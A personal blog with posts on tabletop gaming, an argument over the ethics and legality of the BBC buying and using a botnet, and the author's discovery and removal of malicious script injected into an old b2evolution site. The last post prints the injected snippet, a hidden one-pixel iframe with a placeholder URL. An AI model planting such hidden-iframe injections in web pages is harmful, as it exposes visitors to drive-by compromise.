Another outing for the Warriors of Chaos. This time facing off against Mark (reigning club Warhammer champion no less!) and his Dark Elves. Here is the full battle report including images created in Battle Chronicler.
Read the rest of this entry »

Well since yesterday morning when I first wrote about this story the BBC Botnet has made it into a number of news sources including The Guardian who asked “Did BBC botnet break the law?” and the coverage on Sophos’s website and The Register has been mentioned here yesterday. Slashdot had the story posted in which I posted a couple of comments (The links on these posts have driven more traffic to this site than any other source).

Whether the BBC’s action was legal has been the focus of a lot of discussion so far, but in this post I want to discuss whether it was moral. A lot of people are taking the position that the BBC should be thanked for this piece of journalism, as it will raise awareness of the issue and they also destroyed the Botnet. However my own opinion is that what the BBC did completely unacceptable for a number of reasons:

Did they fund crime?

The BBC acquired a Botnet, and although they haven’t entirely explained how it is implied that they bought it. If this is the case then the BBC has knowingly paid a criminal for access to his services. This more than negates any good they can claim by having then disposed of the Botnet.

When the BBC bought that Botnet they helped ensure creating Botnets was profitable which encourages criminals to create more. That is the exact same reason why having the police buy Heroin and Guns from dealers isn’t the solution to gun and drug crime.

Where were the computers?

The BBC Botnet had 22,000 computers in it. The BBC hasn’t said anything about where these computers were, or if it even knew. As Botnets aren’t designed to stay within one geographical region it is unlikely that these 22,000 machines were all within the United Kingdom. It is in fact likely that it will contain 1000s of foriegn PCs, and perfectly possible that it will include machines on military networks either inside or outside of the United Kingdom.

Maybe it’s just me but if I found out that China State Central television (Chinese State broadcaster) had bought access to a Botnet that my PC had been compromised by and used my PC without authorisation, changed my background and then ‘deleted’ the exploit I wouldn’t be overly impressed.

And then there is the question of legal jurisdictions. As Gary McKinnon is finding out at the moment, being in the UK when you access resources in another Country doesn’t protect you from the laws of that Country. If the BBC Botnet included an American PC are they sure their action wasn’t illegal under US or State Law?

Do we want vigilantism?

The debate over whether it is acceptable to produce programs that work like Malware etc but for the purpose of good has been going on for years. Should it be acceptable to write a program that searches for PCs with a security flaw and install an application on them that removes all viruses, checks and reports the user for any illegal pornography, checks and reports the user for any pirated content and then fixes the security flaw? I would hope most people would say no to this extreme example, but what needs to be considered is that it can be justified on the same grounds as the BBC’s action.

I posted a story earlier today asking whether the BBC had broken the law when it performed a piece of investigatve journalism which included using a Botnet. The BBC used this botnet to perform spamming and DDoS operations on targets who had agreed to take part which is likely to ensure this side was legal.

However what is less clear is whether the BBC’s use of compromised PCs (the Botnet) whose owners had not given permission was legal under the Computer Misuse Act 1990. Although I initially thought the BBCs actions would of clearly crossed the line, I am beginning to think that they can claim their actions were within the law.

Offence 1:Unauthorised access to computer material

A person is guilty of an offence if—

(a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer;

(b) the access he intends to secure is unauthorised; and

(c) he knows at the time when he causes the computer to perform the function that that is the case

If the BBC broke the law it is likely to be this law. The BBC’s action was clearly intentional (c) and unauthorised (b) so the only question is whether the BBCs instructions to the Botnet to DDoS and Spam are covered by (a) “causes a computer to perform any function with intent to secure access to any program or data”. Given that a computer that is part of a Botnet is running the program that is exploiting it this seems likely to be the case.

Offence 2:Unauthorised modification of computer material

(1) A person is guilty of an offence if—

(a) he does any act which causes an unauthorised modification of the contents of any computer; and

(b) at the time when he does the act he has the requisite intent and the requisite knowledge.

This is the crime that Sophos have chosen to focus on, and in my opinion the BBC are safe on this charge. When the BBC installed a new wallpaper on the people’s computers informing them that they had been compromised it clearly performed “the unauthorised modification of the contents of any computer”. However it is the requirement (b) “has the requisite intent” that the BBC can claim means they did not commit a crime.

For the purposes of subsection (1)(b) above the requisite intent is an intent to cause a modification of the contents of any computer and by so doing—

(a) to impair the operation of any computer;

(b) to prevent or hinder access to any program or data held in any computer; or

(c) to impair the operation of any such program or the reliability of any such data.

What the BBC did probably doesn’t meet this criteria for requisite intent. Do any of you have a different opinion on the matter?

update 13th March 17:30:

David Harley left a comment on this topic including a link to his own article on this subject, I found it extremely informative and interesting to read and suggest it strongly to anyone interested in this story.

I am part of a D&D 4 campaign being run by Maurice Walshe at the local gaming club Bedford Gladiators. We play once a month and started with 10 players, with 7 of those still taking part. During the 5 months we have been playing we have been following a well crafted story which has been Dungeon Mastered well and have an interesting party both in terms of races and roles.

Momentum

What I have found interesting though is how key momentum is to bringing the fun (I use this phrase only as an ironic reference to the obsession the D&D4 book writers have with it). During the first couple of sessions the gigantic party size and the fact the majority of players are new to D&D4 meant that things were always going to progress slowly. However even as party size decreased and the players’ rules knowledge improved momentum hasn’t always been consistently present.

Yesterday we had a party of 7 players (including a couple that hadn’t been present for a couple of months), and a gaming session that was almost entirely dominated by a single encounter fighting something like 17 enemies. Although we were slow to get going once underway the game had enough momentum to keep players interested. The month before with only 5 players and an adventure that included numerous small combat encounters and some interesting NPCs it seemed (at least to some players) that things progressed a little too slowly.

The fact that a session with more players and less story seemed more engrossing appeared odd to me, but I am beginning to think that players aren’t put off by the time between their actions, but instead by the momentum of the game while they aren’t active. To put it in context, it is interesting to watch any number of team mates play when they work swiftly and perform interesting actions, but if you have to sit through just one other player who takes 5 minutes to shift and then run away repeatedly you’ll swiftly want to take up self harm to alleviate the boredom.

What I think helped massively last night was that the player managing the initiatives was pro-active in getting players acting (thanks Stephen) and the players as a whole wanted a fast pace and were encouraged by the group to act at it. I also think that once a good pace is found players will endeavour to work at it, but in the same way once momentum is lost and players lose interest it will take a conscious effort by the DM or the players as a group to bring things back on track.

8 players took part in the 500pt Warhammer 40K campaign I ran at the weekend, although 3 games were originally planned we only had sufficient time to play 2. Everyone seemed to have a good day, and it has got 40K back firmly into the playing schedule and one of the club members considering selling his soul to the Chaos gods for the money to buy some troops in their name.

The only area where I think I could and should have planned better was time. The trouble I find with time is that it never behaves in practice like it seems it should in theory.

1. I had a previous engagement which I was late for, by good fortune I was done in time but not early enough to get boards setup and explain the day to players as early as hoped.
2. People never arrive the ‘the time’, something about which I am as bad as anyone else. It is worth planning a short period of lost time into the beginning of an event to cover for this (say 14:00 start, actually plan for 14:20 etc).
3. Factor in meals  when planning timings, something I didn’t do and then proceeded to go and get chips prior to starting the first game.
4. Consider the experience of the people playing. We had a couple of new players (and Dave!) and were never going to complete games as quickly as other players.

If you do end up in a situation where time is becoming an issue, consider your options. I chose to drop the 3rd game at the end of the 1st game as it was clear we weren’t going to get through two more games in the time available. If you don’t want to drop games then you need to manage time the whole way through the event. This means making it clear to players when they must be finished by, and what to do if they haven’t completed the game by this point. If I was organising an event with strict time limits I would probably not play myself, as this would give me the ability to monitor games and try and keep them on track.

The last update on Adrantis V should be when I have produced an updated version of the Adrantis V campaign pack, and publish that to the site.

In the process of creating this site I have been checking up on other domains I own and considering whether they need to exist as seperate entities or could be subsumed into this site. Maurice Walshe noticed some strange behaviour on one of these domains. When visited in IE7 the site attempted to execute a script and then crashed the browser. This set some alarm bells going as although I had semi-abandoned this domain as a failed experiment with b2evolution, it was still getting quite a bit of traffic and I didn’t want to be responsible for people’s computers being compromised.

My standard browser is FireFox and on visiting the domain in this browser I noticed no issues with how the site behaved. Opening up IE7 and trying that prompted a hissy fit by the computers virus checker which noted a malicious JavaScript attempting to run. I opened up the source code for the page and the following section at the very end jumped out at me.

<script>check_content()</script><script>check_content()</script>
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
</iframe><script> 

It didn’t take a genuis to work out that this wasn’t b2evolution code and was evidently the cause of the issue. Due to the fact that the code was positioned after the </html> tag meant this could only plausibly be in the index.php and/or default.php. Sure enough, when I checked these files there it was sitting at the end and removing it fixed the damage.

What I have not however been able to determine is how the code was appended to the files. It is evidently possible for someone to inject new code into this sites index.php file which will be run by all the visitors. Has anyone had an issue like this (especially if it is with b2evolution) and if so what was the exploit?